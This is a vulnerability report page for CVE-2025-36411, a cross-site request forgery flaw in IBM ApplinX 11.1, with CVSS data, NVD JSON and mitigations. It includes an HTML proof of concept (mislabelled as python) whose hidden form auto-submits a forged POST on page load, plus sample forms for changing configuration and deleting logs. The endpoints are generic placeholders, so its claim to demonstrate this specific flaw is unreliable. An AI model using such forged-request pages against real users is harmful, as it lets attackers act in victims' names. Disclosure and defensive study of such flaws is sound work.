Security Vulnerability Report
中文
CVE-2025-36411 CVSS 3.5 LOW

CVE-2025-36411

Published: 2026-01-20 16:16:05
Last Modified: 2026-01-26 19:46:35
Source: [email protected]

Description

IBM ApplinX 11.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:applinx:11.1.0:*:*:*:*:*:*:* - VULNERABLE
IBM ApplinX 11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-36411 targeting IBM ApplinX 11.1 --> <!-- This PoC demonstrates a CSRF attack that could force a logged-in user to perform unauthorized actions --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>IBM ApplinX CSRF Attack PoC - CVE-2025-36411</title> <style> body { font-family: Arial, sans-serif; padding: 20px; background-color: #f5f5f5; } .container { max-width: 800px; margin: 0 auto; background: white; padding: 30px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); } h1 { color: #d32f2f; } .info { background: #e3f2fd; padding: 15px; border-radius: 5px; margin: 20px 0; } .hidden-form { display: none; } .success { color: #4caf50; font-weight: bold; } .warning { color: #ff9800; font-weight: bold; } </style> </head> <body> <div class="container"> <h1>CSRF PoC: CVE-2025-36411</h1> <div class="info"> <strong>Target:</strong> IBM ApplinX 11.1<br> <strong>Vulnerability:</strong> Cross-Site Request Forgery<br> <strong>CVSS Score:</strong> 3.5 (Low)<br> <strong>Attack Vector:</strong> Network-based, requires user interaction </div> <h2>Attack Description</h2> <p>This PoC demonstrates how an attacker can trick an authenticated IBM ApplinX user into executing unauthorized actions. When the victim visits this page while logged into IBM ApplinX, the hidden form will automatically submit a forged request.</p> <h2>Example Attack Vectors</h2> <div class="info"> <h3>1. Configuration Modification</h3> <pre>&lt;form action="https://target-applinx.example.com/api/config/update" method="POST"&gt; &lt;input type="hidden" name="setting" value="malicious_value"&gt; &lt;input type="hidden" name="CSRF_TOKEN" value="FORGED_OR_EMPTY"&gt; &lt;/form&gt;</pre> <h3>2. Session-Based Action Execution</h3> <pre>&lt;form action="https://target-applinx.example.com/session/action" method="POST"&gt; &lt;input type="hidden" name="action" value="delete_logs"&gt; &lt;input type="hidden" name="confirm" value="true"&gt; &lt;/form&gt;</pre> </div> <!-- Hidden form that auto-submits --> <form id="csrfForm" class="hidden-form" action="https://target-applinx.example.com/api/endpoint" method="POST"> <input type="hidden" name="operation" value="malicious_action"> <input type="hidden" name="param1" value="value1"> <input type="hidden" name="param2" value="value2"> <!-- Missing or forged CSRF token --> <input type="hidden" name="csrf_token" value=""> </form> <script> // Auto-submit the forged request document.addEventListener('DOMContentLoaded', function() { console.log('CSRF PoC loaded - Auto-submitting forged request'); document.getElementById('csrfForm').submit(); }); </script> <h2>Mitigation</h2> <ul> <li class="warning">Implement CSRF tokens in all state-changing requests</li> <li class="warning">Verify Origin/Referer headers</li> <li class="warning">Use SameSite cookie attribute</li> <li class="success">Upgrade to patched IBM ApplinX version</li> </ul> </div> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36411", "sourceIdentifier": "[email protected]", "published": "2026-01-20T16:16:04.637", "lastModified": "2026-01-26T19:46:34.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM ApplinX 11.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts."}, {"lang": "es", "value": "IBM ApplinX 11.1 es vulnerable a falsificación de petición en sitios cruzados, lo que podría permitir a un atacante ejecutar acciones maliciosas y no autorizadas transmitidas desde un usuario en quien el sitio web confía."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:applinx:11.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7116F100-D485-4B66-A910-9A4663360A0F"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7257446", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.